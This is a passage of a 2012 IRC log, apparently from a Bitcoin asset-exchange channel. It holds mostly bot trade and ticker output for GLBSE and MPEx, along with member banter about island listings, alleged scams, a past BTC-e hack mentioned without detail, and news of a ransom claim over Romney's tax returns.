GLBSE (might take a while). Sep 05 18:05:12 DMC [1@0.85BTC] paid: 0.02635814 BTC. Last price: 0.036101 BTC. Capital gain: -0.813899 BTC. Total: -0.78754086 BTC. (-92.7%) Sep 05 18:05:19 !pl DMC 1@0.5 Sep 05 18:05:20 Requesting data from GLBSE (might take a while). Sep 05 18:05:30 DMC [1@0.5BTC] paid: 0.02635814 BTC. Last price: 0.036101 BTC. Capital gain: -0.463899 BTC. Total: -0.43754086 BTC. (-87.5%) Sep 05 18:05:47 this is pathetic, Diablo-D3! Sep 05 18:06:10 how do you know that's not a scam exahash ? Sep 05 18:06:11 even TYgr crap is worth more :) Sep 05 18:06:35 @mircea_popescu - what? the islands site? Sep 05 18:06:38 not you again, mircea_popescu Sep 05 18:06:49 exahash yea Sep 05 18:07:00 EskimoBob remind me, what are you doing here again ? Sep 05 18:08:00 that sites been around for over 10 years. I don't "know" 100% its not scam, as I have not bought an island through them. Sep 05 18:08:22 its basically an mls site for islands instead of houses Sep 05 18:08:41 hm Sep 05 18:08:42 I have read the magazine that goes with it Sep 05 18:08:58 pretty sure they're legit, and have nothing to do with bitcoin Sep 05 18:08:59 i never saw it before, sounded like a silly internet scam domain Sep 05 18:09:30 like mpex? Sep 05 18:09:37 6 acres / 2.53 ha | Freehold | Private Island Sep 05 18:09:37 USD 29,900 Sep 05 18:09:40 this is pretty decent. Sep 05 18:10:06 look at the higher priced ones :-) Sep 05 18:10:15 srsly... why i want more than 6 acres ? Sep 05 18:10:20 what am i doing, raising cattle ? Sep 05 18:10:25 six women, six acres. Sep 05 18:10:26 and a mule. Sep 05 18:10:46 privacy Sep 05 18:10:53 so they can't see your house from a boat? Sep 05 18:11:28 let them see it, what. Sep 05 18:11:30 and protection from the ocean Sep 05 18:11:31 maybe they learn some new moves. Sep 05 18:11:36 storms Sep 05 18:11:50 i guess that's ap oint yeah... Sep 05 18:12:47 no ciuciu, so he and his friends can go to the beach http://2.bp.blogspot.com/_8df4nD_0d4c/TQi2Ee7GxeI/AAAAAAAAAHg/nW7el112MSg/s1600/1071221803-0B.jpg Sep 05 18:13:42 [GLBSE] [TEEK.B] 4 @ 0.8601 = 3.4404 BTC [+] Sep 05 18:13:43 [GLBSE] [TEEK.B] 4 @ 0.86 = 3.44 BTC [-] Sep 05 18:13:44 [GLBSE] [TEEK.B] 1 @ 0.85 BTC [-] Sep 05 18:13:46 [GLBSE] [TEEK.B] 1 @ 0.78 BTC [-] Sep 05 18:14:00 [GLBSE] [GSDPT] 5071 @ 0.003393 = 17.2059 BTC [+] Sep 05 18:14:52 actually it's a lot more like http://polimedia.us/dtng/c/src/13456595538.jpg Sep 05 18:15:50 [GLBSE] [OBSI.HRPT] 92 @ 0.1041 = 9.5772 BTC [-] Sep 05 18:15:51 mircea_popescu: we all know you got lots of shit on your page. No need to advertise it Sep 05 18:16:31 it's just women dood. women aren't shit. Sep 05 18:19:05 [GLBSE] [GMVT-BOT] 2 @ 0.16889 = 0.3378 BTC [-] Sep 05 18:20:16 [GLBSE] [GMVT-BOT] 1 @ 0.1689 BTC [+] Sep 05 18:26:27 [GLBSE] [OBSI.HRPT] 95 @ 0.1041 = 9.8895 BTC [-] Sep 05 18:28:05 [MPEX] [F.GIGA.ETF] 1866 @ 0.00080701 = 1.5059 BTC [+] Sep 05 18:28:07 [MPEX] [F.GIGA.ETF] 17234 @ 0.0008094 = 13.9492 BTC [+] **** BEGIN LOGGING AT Wed Sep 5 18:53:43 2012 Sep 05 19:09:30 [GLBSE] [NYAN.B] 4 @ 1 = 4 BTC [+] Sep 05 19:12:27 [MPEX] [S.MPOE] 23700 @ 0.00039812 = 9.4354 BTC [-] Sep 05 19:14:47 !ticker FDBF Sep 05 19:14:49 [GLBSE:FDBF] [Bid: 0.149] [Ask: 0.15] [Spread: 0.001] [Last: 0.15] [24hVol: 29.69999805] [7dAvg: 0.14843927] Sep 05 19:18:01 [GLBSE] [GIGAMINING] 1 @ 0.799 BTC [+] Sep 05 19:18:02 [GLBSE] [GIGAMINING] 23 @ 0.8 = 18.4 BTC [+] Sep 05 19:21:53 http://polimedia.us/bitcoin/faq.html#6 Sep 05 19:22:08 in the immortal words of myself, "Trying to be part of a cryptocurrency without knowing how to use gpg is like trying to be part of the 60s without knowing how to use a bong." Sep 05 19:27:20 [GLBSE] [YABIF] 1 @ 0.99403 BTC [-] Sep 05 19:31:31 [MPEX] [S.MPOE] 2764 @ 0.00039812 = 1.1004 BTC [-] Sep 05 19:31:32 [MPEX] [S.MPOE] 6736 @ 0.00039797 = 2.6807 BTC [-] Sep 05 19:35:01 [GLBSE] [GIGAMINING] 2 @ 0.795 = 1.59 BTC [-] Sep 05 19:35:02 [GLBSE] [GIGAMINING] 1 @ 0.7945 BTC [-] Sep 05 19:35:04 [GLBSE] [GIGAMINING] 18 @ 0.79 = 14.22 BTC [-] Sep 05 19:35:05 [GLBSE] [GIGAMINING] 4 @ 0.75 = 3 BTC [-] Sep 05 19:40:48 [GLBSE] [PAJKA.BOND] 8 @ 0.058 = 0.464 BTC [-] Sep 05 19:40:50 [GLBSE] [PAJKA.BOND] 1 @ 0.058 BTC [-] Sep 05 19:41:32 [GLBSE] [PAJKA.BOND] 1 @ 0.0575 BTC [-] Sep 05 19:43:21 [GLBSE] [PAJKA.BOND] 3 @ 0.057 = 0.171 BTC [-] Sep 05 19:43:43 [GLBSE] [FUTUREFUND] 1 @ 0.0001222 BTC [-] Sep 05 19:44:18 [GLBSE] [PAJKA.BOND] 8 @ 0.05555 = 0.4444 BTC [-] Sep 05 19:45:48 [GLBSE] [LTC-MINING] 10 @ 0.65 = 6.5 BTC [-] Sep 05 19:46:29 [GLBSE] [NYAN.A] 2 @ 0.99 = 1.98 BTC [-] Sep 05 19:51:06 [GLBSE] [FDBF] 30 @ 0.15 = 4.5 BTC [+] Sep 05 19:52:46 [MPEX] [F.GIGA.ETF] 5000 @ 0.0008089 = 4.0445 BTC [-] Sep 05 19:52:47 [MPEX] [F.GIGA.ETF] 11600 @ 0.0007977 = 9.2533 BTC [-] Sep 05 19:52:49 [MPEX] [F.GIGA.ETF] 24900 @ 0.00079414 = 19.7741 BTC [-] Sep 05 19:52:50 [MPEX] [F.GIGA.ETF] 5511 @ 0.00079257 = 4.3679 BTC [-] Sep 05 19:52:51 [MPEX] [F.GIGA.ETF] 2989 @ 0.00078855 = 2.357 BTC [-] Sep 05 19:57:01 [GLBSE] [NYAN.C] 3 @ 0.798 = 2.394 BTC [+] Sep 05 19:58:45 [GLBSE] [GMVT-BOT] 2 @ 0.12 = 0.24 BTC [-] Sep 05 19:59:07 [GLBSE] [GMVT-BOT] 1 @ 0.117 BTC [-] Sep 05 19:59:44 [GLBSE] [GMVT-BOT] 1 @ 0.115 BTC [-] Sep 05 20:00:03 [MPEX] [F.GIGA.ETF] 3909 @ 0.00082042 = 3.207 BTC [+] Sep 05 20:00:05 [MPEX] [F.GIGA.ETF] 300 @ 0.00082103 = 0.2463 BTC [+] Sep 05 20:00:19 [GLBSE] [GMVT-BOT] 2 @ 0.1111 = 0.2222 BTC [-] Sep 05 20:00:20 [GLBSE] [GMVT-BOT] 10 @ 0.101 = 1.01 BTC [-] Sep 05 20:00:22 [GLBSE] [GMVT-BOT] 3 @ 0.1000001 = 0.3 BTC [-] Sep 05 20:00:23 [GLBSE] [GMVT-BOT] 28 @ 0.10000001 = 2.8 BTC [-] Sep 05 20:00:24 [GLBSE] [GMVT-BOT] 17 @ 0.10000001 = 1.7 BTC [-] Sep 05 20:01:24 [GLBSE] [PUREMINING] 2 @ 0.094 = 0.188 BTC [-] Sep 05 20:01:56 [GLBSE] [PUREMINING] 10 @ 0.0931 = 0.931 BTC [-] Sep 05 20:02:14 [GLBSE] [FDBF] 4 @ 0.15 = 0.6 BTC [+] Sep 05 20:02:50 [GLBSE] [BITBOND] 4 @ 0.391 = 1.564 BTC [-] Sep 05 20:03:28 [GLBSE] [BITBOND] 12 @ 0.3901 = 4.6812 BTC [-] Sep 05 20:03:30 [GLBSE] [BFLS.RIG] 1 @ 0.9 BTC [-] Sep 05 20:03:31 [GLBSE] [NYAN.C] 6 @ 0.798 = 4.788 BTC [+] Sep 05 20:03:54 [GLBSE] [NYAN.C] 2 @ 0.798 = 1.596 BTC [+] Sep 05 20:03:57 [GLBSE] [BITBOND] 3 @ 0.39 = 1.17 BTC [-] Sep 05 20:06:27 [GLBSE] [BMMO] 10 @ 0.06100001 = 0.61 BTC [-] Sep 05 20:07:06 [MPEX] [S.MPOE] 29164 @ 0.00039797 = 11.6064 BTC [-] Sep 05 20:07:08 [MPEX] [S.MPOE] 736 @ 0.00039784 = 0.2928 BTC [-] Sep 05 20:07:47 [GLBSE] [GIGAMINING] 1 @ 0.73400001 BTC [-] Sep 05 20:08:22 [GLBSE] [GIGAMINING] 1 @ 0.734 BTC [-] Sep 05 20:10:49 [GLBSE] [BITBOND] 5 @ 0.3901 = 1.9505 BTC [+] Sep 05 20:11:44 [GLBSE] [COGNITIVE] 5 @ 0.5501 = 2.7505 BTC [-] Sep 05 20:12:22 [GLBSE] [MERGEDMINING] 6 @ 0.065 = 0.39 BTC [-] Sep 05 20:13:33 [GLBSE] [YABMC] 5 @ 0.108 = 0.54 BTC [+] Sep 05 20:13:55 [GLBSE] [LTC-MINING] 9 @ 0.65 = 5.85 BTC [-] Sep 05 20:15:25 [GLBSE] [GIGAMINING] 2 @ 0.73400001 = 1.468 BTC [+] Sep 05 20:36:04 [GLBSE] [BITBOND] 2 @ 0.4 = 0.8 BTC [+] Sep 05 20:37:10 [GLBSE] [TEEK.USD] 3 @ 0.09398 = 0.2819 BTC [-] Sep 05 20:41:21 [MPEX] [F.GIGA.ETF] 900 @ 0.00082133 = 0.7392 BTC [+] Sep 05 20:43:16 anyone know how many outstanding shares of tygrr.bond-p there are? Sep 05 20:43:46 gabbynot: ask glbse Sep 05 20:44:02 https://glbse.com/api/quantity_trading/TYGRR.BOND-P Sep 05 20:44:27 thx Sep 05 20:44:48 wow quite a few Sep 05 20:45:18 it says 38402, but there were only 27895 on last dividend payment Sep 05 20:45:32 what's going on? Sep 05 20:45:56 people bought them after last dividend payment I guess Sep 05 20:46:47 Ask piotr_n... lol Sep 05 20:47:34 something doesn't look right Sep 05 20:47:57 it never jumped by that much in a week Sep 05 20:48:08 likely swaps no ? Sep 05 20:48:29 Yea, there's quite a flame on the thread Sep 05 20:48:47 Goat says he has 40000BTC on his account Sep 05 20:48:57 So he's selling the bonds Sep 05 20:49:09 ah Sep 05 20:49:11 goat has 40k ? Sep 05 20:49:19 On pirate Sep 05 20:49:24 o o. maybe. Sep 05 20:49:26 We can say he had Sep 05 20:49:38 Some of it was investor's Sep 05 20:52:47 [GLBSE] [GSDPT] 20 @ 0.003393 = 0.0679 BTC [+] Sep 05 20:53:42 [GLBSE] [NYAN.B] 1 @ 1 BTC [+] Sep 05 20:56:18 nyan.c should be worth a bundle if matthew actually pays everyone Sep 05 20:56:57 matthew pays as in, m. n. wright ? Sep 05 20:57:08 yep Sep 05 20:57:17 i think i have some confederate bonds somewhere, i should make a glbse fund Sep 05 20:57:27 they'll be worth quite a bit just as soon as general lee wins the war. Sep 05 20:57:30 lol Sep 05 20:58:17 isn't friday his deadline for the bets? Sep 05 20:58:22 [GLBSE] [JLP-BMD] 1 @ 0.09999 BTC [+] Sep 05 21:00:22 in a sense. Sep 05 21:00:30 [GLBSE] [FUTUREFUND] 15 @ 0.0001222 = 0.0018 BTC [-] Sep 05 21:01:12 the forum stuff is entertaining. way better than any movie. Sep 05 21:01:42 yep, i was sayin the same thing Sep 05 21:02:10 [GLBSE] [BBBB] 30 @ 0.00024 = 0.0072 BTC [+] Sep 05 21:03:21 Mr Supa wanted me to post this https://bitcointalk.org/index.php?topic=106018.0 Sep 05 21:03:44 whop's mrs upa Sep 05 21:04:03 mr SupaDupa Sep 05 21:04:12 Petition to Shutdown BTC-e and have all assests given back to the tax payers Sep 05 21:04:14 what da ?! Sep 05 21:04:19 there's taxpayers in btc now ? Sep 05 21:05:16 pity such weak fakedrama nao. Sep 05 21:05:19 the forum can do better. Sep 05 21:06:43 MrWubbles: Wasn't you the one who make a shitton hacking btc-e? Sep 05 21:06:47 :D Sep 05 21:06:56 maybe Sep 05 21:07:13 Nice night that one Sep 05 21:07:28 Entertaining Sep 05 21:07:34 btc-e got haxt ? Sep 05 21:08:06 hi Sep 05 21:08:07 Yea, somebody injected fake USD through LR Sep 05 21:08:08 MrWubbles is full of shit, most of the time Sep 05 21:08:27 He made BTC reach 99USD Sep 05 21:09:06 lol Sep 05 21:09:44 And MrWubbles was around, taking the credit Sep 05 21:10:14 ereet hackers Sep 05 21:10:17 damn thems Sep 05 21:11:02 daNG tham all to heck! Sep 05 21:11:29 ;;ident MrWubbles Sep 05 21:11:29 Nick 'MrWubbles', with hostmask 'MrWubbles!~suckmywub@24.69.197.34', is not identified. Sep 05 21:11:32 o i c. Sep 05 21:11:42 moar cryptocurrency experts w/o gpg. Sep 05 21:11:52 It was a nice show. You could watch the consecuences of hyperinflation on fast forward Sep 05 21:12:04 :D Sep 05 21:24:30 [GLBSE] [OBSI.HRPT] 1 @ 0.1041 BTC [-] Sep 05 21:37:35 oh MrWubbles is a winner Sep 05 21:38:00 winnr.rar ? Sep 05 21:39:05 winnah Sep 05 21:40:21 [GLBSE] [TYGRR.BOND-P] 39 @ 0.09 = 3.51 BTC [-] Sep 05 21:43:54 [GLBSE] [GSDPT] 2500 @ 0.003393 = 8.4825 BTC [+] Sep 05 21:44:16 [MPEX] [S.MPOE] 20300 @ 0.00039784 = 8.0762 BTC [-] Sep 05 21:44:32 ;;ticker Sep 05 21:44:33 Best bid: 10.515, Best ask: 10.55, Bid-ask spread: 0.03500, Last trade: 10.55, 24 hour volume: 27817, 24 hour low: 10.181, 24 hour high: 10.6 Sep 05 21:44:35 win.rar Sep 05 21:45:54 [GLBSE] [PPT.A] 9 @ 0.32 = 2.88 BTC [+] Sep 05 21:46:42 those .32s look like so much pain Sep 05 21:47:42 Yea, those are the insurance Sep 05 21:47:44 That's the guarantee on them Sep 05 21:49:26 yep Sep 05 21:49:46 Chaang, Patrick, etc. Sep 05 21:49:56 They've all been hit quite hard Sep 05 21:49:59 yeah. Sep 05 21:50:14 The whole economy Sep 05 21:50:18 i suppose next time mpoe-pr says x is shit they remember this and pay fucking deference. Sep 05 21:50:25 no. the whole wannabe-economy. Sep 05 21:50:41 Well, yes Sep 05 21:51:03 The whole embrionary economy Sep 05 21:51:09 teh economy is sr and clubs with seals and on and on. Sep 05 21:51:20 not some people lending fiddy bucks in the backalley. Sep 05 21:51:54 Seals is that big? Sep 05 21:52:06 this is like confusing wall street with the bowery for chrissakes. Sep 05 21:52:11 I haven't even looked into them Sep 05 21:52:27 they seem to be doing ok. Sep 05 21:52:39 not implying they're au par with sr, just pulled a name. Sep 05 21:53:07 if i said satoshi dice it'd be biased, neh ? Sep 05 21:53:11 Ok, I thought there was some order of magnitude away.... Sep 05 21:53:25 A little, maybe... Sep 05 21:53:28 :) Sep 05 21:53:34 hard to tell how much sr makes. Sep 05 21:53:49 if the 6k a month figure is correct then that's less than sd's last. Sep 05 21:54:02 also hard to guess how much seals makes, but a few k might be it. Sep 05 21:57:12 mircea_popescu: do even you believe this crap you write? Sep 05 21:57:46 is there another channel where I can see GLBSE trades and not this shit you write? Sep 05 21:58:03 ;;topic Sep 05 21:58:03 Bitcoin asset exchanges: GLBSE https://glbse.com || MPEx http://polimedia.us/mpex || CST https://cryptostocks.com || ICBIT https://icbit.se || list bot commands: !help || Streaming trades only: #bitcoin-assets-trades || a biased message: http://smpake.com/ || Net Chart: http://bit.ly/RMjqah Sep 05 21:58:19 for fuck sake, start your own mpx-scam channel and fuck off for good Sep 05 21:58:23 you are looking for #bitcoin-assets-trades Sep 05 21:58:24 :) Sep 05 21:58:28 or just /ignore Sep 05 21:58:49 ignore is good idea because this bull shit is not funny any more Sep 05 21:59:25 what exactly is his problem anyway ? Sep 05 21:59:29 dude, im not greek, simmer down. Sep 05 22:00:51 i know you are not greek. I told you this long time ago. How thick are you? Sep 05 22:01:13 apparently your ignore is broken, too. Sep 05 22:01:16 CPA would solve so many of this world's problems Sep 05 22:01:21 LIke goatse spam Sep 05 22:01:29 It's a pity that guy didn't have a contract with us. Sep 05 22:02:08 nothing wrong with my ignore, You just have not made it to the list yet Sep 05 22:02:15 Just imagine a big bandaid over the asshole with CPA written on it. "CPA. Protecting you from goatse spam before it even begins". Hmm. I wonder if that would be a viable advertising campaign for a bus or a subway or somehthing Sep 05 22:02:39 lol usagi Sep 05 22:02:39 have you ever done advertising on a bus or a subway or something ? Sep 05 22:03:09 kakobrekla: /ignore who? Sep 05 22:03:15 i just got back Sep 05 22:03:32 looking at mpex, I guess you know all about advertising. Please, mircea_popescu, amuse us Sep 05 22:03:45 Oh him.... right, right... Sep 05 22:03:52 I didn't notice :p Sep 05 22:03:57 hello EskimoBob Mr Supa says hi Sep 05 22:03:58 and long time Sep 05 22:04:14 who is Supa? Sep 05 22:04:20 im guessing best be proactive about this. Sep 05 22:04:34 SupaDupaJenkins Sep 05 22:04:39 ? Sep 05 22:04:42 eskimobob: Is he talking about glbse again? Sep 05 22:04:47 no idea who this clown is Sep 05 22:05:31 [MPEX] [S.MPOE] 2300 @ 0.00039934 = 0.9185 BTC [+] Sep 05 22:05:40 Mr Supa known for his work in the softmod console community as well as his Noob Guides to P2Pool Sep 05 22:05:54 Oh poker again.. lol, thats another one... he mentions poker a lot doesn't he Sep 05 22:06:02 among various commits and pushes on git Sep 05 22:06:06 Something about poker players making it in bitcoin Sep 05 22:07:06 you should come on over here EskimoBob. To the mature side. *sniffs air* Aaaah, it's a beautiful day! Sep 05 22:07:20 usagi!*@* added to ignore list. Sep 05 22:08:26 [GLBSE] [GSDPT] 300 @ 0.003393 = 1.0179 BTC [+] Sep 05 22:11:05 silence lol Sep 05 22:11:37 prob from his east european gf`s Sep 05 22:11:46 you can not shoot what you can not see Sep 05 22:14:25 [GLBSE] [NYAN.B] 1 @ 1 BTC [+] Sep 05 22:14:42 you got cooties. bah Sep 05 22:16:27 !ticker FDBF Sep 05 22:16:33 [GLBSE:FDBF] [Bid: 0.149] [Ask: 0.15] [Spread: 0.001] [Last: 0.15] [24hVol: 26.99999857] [7dAvg: 0.14847284] Sep 05 22:17:33 !pl [@] [] Sep 05 22:17:38 Requesting data from GLBSE (might take a while). Sep 05 22:17:50 DMC [1@1BTC] paid: 0.02635814 BTC. Last price: 0.036101 BTC. Capital gain: -0.963899 BTC. Total: -0.93754086 BTC. (-93.8%) Sep 05 22:17:50 [GLBSE] [OBSI.HRPT] 16 @ 0.1041 = 1.6656 BTC [-] Sep 05 22:18:38 [GLBSE] [OBSI.HRPT] 1 @ 0.1041 BTC [-] Sep 05 22:24:46 ;;ticker Sep 05 22:24:47 Best bid: 10.6, Best ask: 10.62, Bid-ask spread: 0.02000, Last trade: 10.62, 24 hour volume: 29104, 24 hour low: 10.181, 24 hour high: 10.64499 Sep 05 22:27:55 [GLBSE] [DMC] 13 @ 0.075 = 0.975 BTC [+] Sep 05 22:27:56 [GLBSE] [DMC] 5 @ 0.0799 = 0.3995 BTC [+] Sep 05 22:27:57 [GLBSE] [DMC] 50 @ 0.07999999 = 4 BTC [+] Sep 05 22:32:08 [GLBSE] [DMC] 50 @ 0.0855 = 4.275 BTC [+] Sep 05 22:32:10 [GLBSE] [DMC] 20 @ 0.085989 = 1.7198 BTC [+] Sep 05 22:32:10 [GLBSE] [DMC] 7 @ 0.08699 = 0.6089 BTC [+] Sep 05 22:32:11 [GLBSE] [DMC] 5 @ 0.087199 = 0.436 BTC [+] Sep 05 22:32:13 [GLBSE] [DMC] 18 @ 0.08899 = 1.6018 BTC [+] Sep 05 22:32:24 is EskimoBob drunk again? Sep 05 22:34:40 [GLBSE] [NYAN.C] 9 @ 0.751 = 6.759 BTC [-] Sep 05 22:34:41 [GLBSE] [NYAN.C] 7 @ 0.75 = 5.25 BTC [-] Sep 05 22:39:07 [GLBSE] [RAREEARTH] 86 @ 0.0096 = 0.8256 BTC [+] Sep 05 22:39:12 [GLBSE] [TYGRR.BOND-P] 1 @ 0.0999 BTC [+] Sep 05 22:40:13 [GLBSE] [NYAN.C] 2 @ 0.75 = 1.5 BTC [-] Sep 05 22:40:15 [GLBSE] [NYAN.C] 1 @ 0.7111 BTC [-] Sep 05 22:40:16 [GLBSE] [NYAN.C] 9 @ 0.711 = 6.399 BTC [-] Sep 05 22:44:31 kakobrekla : twitter discards identical updates. sometimes ppl buy 1k options blocks in sucession and only one gets reported. if i add some code at the end of the twitter message will it bork your bot ? Sep 05 22:47:32 it should not Sep 05 22:47:40 gonna add microtime' Sep 05 22:47:56 ? Sep 05 22:48:12 nah a 3 digit random number i was thinking Sep 05 22:48:22 aite let's see here. Sep 05 22:48:38 well microtime makes at least some sense Sep 05 22:49:47 [MPEX] [S.MPOE] 1 @ 0.00039934 BTC [+] Sep 05 22:49:51 seems fine Sep 05 22:50:23 [GLBSE] [OBSI.HRPT] 1 @ 0.1041 BTC [-] Sep 05 22:50:23 its preety resilient Sep 05 22:50:37 [GLBSE] [ASICMINER] 1 @ 0.141 BTC [-] Sep 05 22:50:39 [GLBSE] [ASICMINER] 1 @ 0.14 BTC [-] Sep 05 22:50:40 [GLBSE] [ASICMINER] 3 @ 0.137 = 0.411 BTC [-] Sep 05 22:51:49 eh wtf Sep 05 22:54:22 [MPEX] [S.MPOE] 1 @ 0.00039934 BTC [+] Sep 05 22:54:39 [MPEX] [S.MPOE] 1 @ 0.00039934 BTC [+] Sep 05 22:54:44 ya ok. Sep 05 22:54:57 Quantum Romneyism: http://www.bash.org/?951317 Sep 05 22:57:33 [GLBSE] [ASICMINER] 1 @ 0.136 BTC [-] Sep 05 22:57:34 [GLBSE] [ASICMINER] 1 @ 0.134 BTC [-] Sep 05 22:57:35 Diablo-D3 http://betabeat.com/2012/09/hackers-claim-theyre-holding-mitt-romneys-tax-returns-for-bitcoin-ransom/ Sep 05 22:57:36 [GLBSE] [ASICMINER] 4 @ 0.129 = 0.516 BTC [-] Sep 05 22:57:36 [GLBSE] [ASICMINER] 31 @ 0.12730011 = 3.9463 BTC [-] Sep 05 22:57:37 [GLBSE] [ASICMINER] 10 @ 0.12720011 = 1.272 BTC [-] Sep 05 22:57:38 [GLBSE] [ASICMINER] 10 @ 0.12710001 = 1.271 BTC [-] Sep 05 22:57:39 [GLBSE] [ASICMINER] 3 @ 0.12710001 = 0.3813 BTC [-] Sep 05 22:58:11 (via mod6 :p) Sep 05 22:59:41 lolwhat Sep 05 23:00:26 [GLBSE] [KRAKEN] 19 @ 0.00999999 = 0.19 BTC [+] Sep 05 23:00:44 [GLBSE] [TYGRR.BOND-P] 10 @ 0.0999 = 0.999 BTC [+] Sep 05 23:07:24 here's another: Sep 05 23:07:25 http://venturebeat.com/2012/09/05/romney-tax-returns-hacked/ Sep 05 23:07:51 lol Sep 05 23:08:47 jcpham you should be pumpkinmonster Sep 05 23:09:15 lol Sep 05 23:11:23 [GLBSE] [TYGRR.BOND-P] 20 @ 0.0999 = 1.998 BTC [+] Sep 05 23:14:07 :O Sep 05 23:14:55 [MPEX] [S.MPOE] 12902 @ 0.00040052 = 5.1675 BTC [+] Sep 05 23:16:58 [MPEX] [S.MPOE] 37125 @ 0.00040067 = 14.8749 BTC [+] Sep 05 23:19:17 [MPEX] [O.BTCUSD.C010T] 750 @ 0.9068351 = 680.1263 BTC [+] Sep 05 23:26:31 [MPEX] [S.MPOE] 11273 @ 0.00040067 = 4.5168 BTC [+] Sep 05 23:26:33 [MPEX] [S.MPOE] 33216 @ 0.00039934 = 13.2645 BTC [-] Sep 05 23:26:34 [MPEX] [S.MPOE] 3511 @ 0.00039926 = 1.4018 BTC [-] Sep 05 23:29:42 http://bitcoin-otc.com/viewratingdetail.php?nick=pirateat40&sign=ANY&type=RECV Sep 05 23:29:51 lol at pirate's slow decline towards hell. Sep 05 23:30:09 maybe there's wisdom to the ponderous way the crowd ends up doing things. Sep 05 23:30:52 [MPEX] [S.MPOE] 3189 @ 0.00039926 = 1.2732 BTC [-] Sep 05 23:31:22 TANGO DOWN: http://bitcointalk.org Sep 05 23:31:46 I'm still patiently waiting mircea_popescu Sep 05 23:31:57 I'm not hasty with my ratings at all Sep 05 23:32:12 pumpkinmonster yeah. Sep 05 23:32:30 the glass isn't half empty Sep 05 23:32:39 it is the wrong size container Sep 05 23:32:41 thinking about it... as someone pointed out, not like there's that many innocent bystanders that might haven ot heard about it. Sep 05 23:32:46 ahah say wut ? Sep 05 23:33:12 o look! bitcointalk is down! Sep 05 23:33:20 quick, everyone flock to http://polimedia.us/btcf/index.php Sep 05 23:33:32 :) Sep 05 23:33:39 lol Sep 05 23:33:40 [MPEX] [F.GIGA.ETF] 5591 @ 0.00082104 = 4.5904 BTC [-] Sep 05 23:33:51 glass hlaf/empty...glass half/full Sep 05 23:33:58 both incorrect Sep 05 23:34:04 container is improperly sized Sep 05 23:34:10 it's not a half empty glass, it's a mostly full m&m ? Sep 05 23:34:29 [GLBSE] [KRAKEN] 10 @ 0.00999999 = 0.1 BTC [+] Sep 05 23:34:45 [GLBSE] [OBSI.HRPT] 5 @ 0.104 = 0.52 BTC [-] Sep 05 23:35:12 [GLBSE] [FOO.PPPPT] 10 @ 0.14 = 1.4 BTC [+] Sep 05 23:36:27 [GLBSE] [OBSI.HRPT] 4 @ 0.104 = 0.416 BTC [-] Sep 05 23:36:37 [GLBSE] [NYAN.C] 9 @ 0.641 = 5.769 BTC [-] Sep 05 23:36:39 [GLBSE] [NYAN.C] 40 @ 0.6 = 24 BTC [-] Sep 05 23:36:40 [GLBSE] [NYAN.C] 9 @ 0.571 = 5.139 BTC [-] Sep 05 23:36:41 [GLBSE] [NYAN.C] 300 @ 0.57 = 171 BTC [-] Sep 05 23:37:22 [GLBSE] [OBSI.HRPT] 1 @ 0.1041 BTC [+] Sep 05 23:38:00 nope Sep 05 23:38:07 [GLBSE] [OBSI.HRPT] 4 @ 0.104 = 0.416 BTC [-] Sep 05 23:38:09 I'm waiting for the postcard Sep 05 23:40:04 [MPEX] [O.BTCUSD.P130T] 1 @ 0.37899218 BTC [-] Sep 05 23:44:48 you ain't gettin' no postcards. Sep 05 23:53:19 [GLBSE] [FUTUREFUND] 3 @ 0.0001222 = 0.0004 BTC [-] Sep 05 23:54:13 [GLBSE] [BAKEWELL] 2 @ 0.125 = 0.25 BTC [-] Sep 05 23:54:20 awww... Sep 05 23:56:08 But I wanted a postcard with pirate's avatar on an island on a longchair. With caption: "Thanks to the crew for another succesful plundering. Arrr mateys!" Sep 05 23:56:33 I am strongly disapointed. Sep 06 00:01:18 [GLBSE] [GIGAMINING] 2 @ 0.7997 = 1.5994 BTC [+] Sep 06 00:01:51 [GLBSE] [GIGAMINING] 3 @ 0.7997 = 2.3991 BTC [+] Sep 06 00:03:11 [GLBSE] [GIGAMINING] 3 @ 0.7998 = 2.3994 BTC [+] Sep 06 00:04:06 you can't even spell dissapoint Sep 06 00:04:21 [GLBSE] [GIGAMINING] 3 @ 0.7998 = 2.3994 BTC [+] Sep 06 00:06:27 [GLBSE] [OBSI.HRPT] 2 @ 0.1035 = 0.207 BTC [-] Sep 06 00:07:23 [GLBSE] [OBSI.HRPT] 10 @ 0.1035 = 1.035 BTC [-] Sep 06 00:07:39 evening gents Sep 06 00:08:30 [GLBSE] [OBSI.HRPT] 1 @ 0.1035 BTC [-] Sep 06 00:08:53 kakobrekla: hey Sep 06 00:09:00 how is it going JWU42 Sep 06 00:10:15 [GLBSE] [OBSI.HRPT] 10 @ 0.1035 = 1.035 BTC [-] Sep 06 00:15:59 [GLBSE] [BDT] 1 @ 1.05 BTC [+] Sep 06 00:18:39 !ticker gigamining Sep 06 00:18:50 [GLBSE:GIGAMINING] [Bid: 0.77] [Ask: 0.7997] [Spread: 0.0297] [Last: 0.7998] [24hVol: 114.31099603] [7dAvg: 0.82350475] Sep 06 00:19:02 !ticker f.giga.etf Sep 06 00:19:03 [MPEX:F.GIGA.ETF] 1day: 0.00070427 / 0.00079311 / 0.00086378 (287116 shares, 227.72 BTC), 30day: 0.00064789 / 0.00095135 / 0.00115139 (9863737 shares, 9,383.94 BTC) Sep 06 00:19:36 so under 8 now huh Sep 06 00:20:32 is there an asset or etf that represents a fund which purports hostage or extortion situations and pulls in a revenue stream from citizens wanting to help save fellow citizens? Sep 06 00:21:00 [GLBSE] [NYAN.C] 2 @ 0.788 = 1.576 BTC [+] Sep 06 00:28:15 [GLBSE] [OBSI.HRPT] 3 @ 0.1035 = 0.3105 BTC [-] Sep 06 00:29:52 [GLBSE] [BMF] 13 @ 0.54999 = 7.1499 BTC [-] Sep 06 00:31:48 [GLBSE] [BMF] 30 @ 0.54999 = 16.4997 BTC [-] Sep 06 00:32:14 [GLBSE] [BMF] 7 @ 0.54999 = 3.8499 BTC [-] Sep 06 00:33:35 [MPEX] [O.BTCUSD.C110T] 20 @ 0.15072854 = 3.0146 BTC [-] Sep 06 00:33:52 [GLBSE] [FUTUREFUND] 5 @ 0.0001222 = 0.0006 BTC [-] Sep 06 00:35:26 [GLBSE] [FDBF] 1 @ 0.15 BTC [+] Sep 06 00:36:58 [GLBSE] [TYGRR.BOND-P] 20 @ 0.095 = 1.9 BTC [-] Sep 06 00:39:15 [GLBSE] [FDBF] 1 @ 0.15 BTC [+] Sep 06 00:40:02 time for you to go night night bitcoins Sep 06 00:42:27 ohh want site up? Sep 06 00:42:29 ohh it's up Sep 06 00:42:31 and it's down again Sep 06 00:42:34 womp womp womp Sep 06 00:42:43 [GLBSE] [ASICMINER] 3 @ 0.128898 = 0.3867 BTC [+] Sep 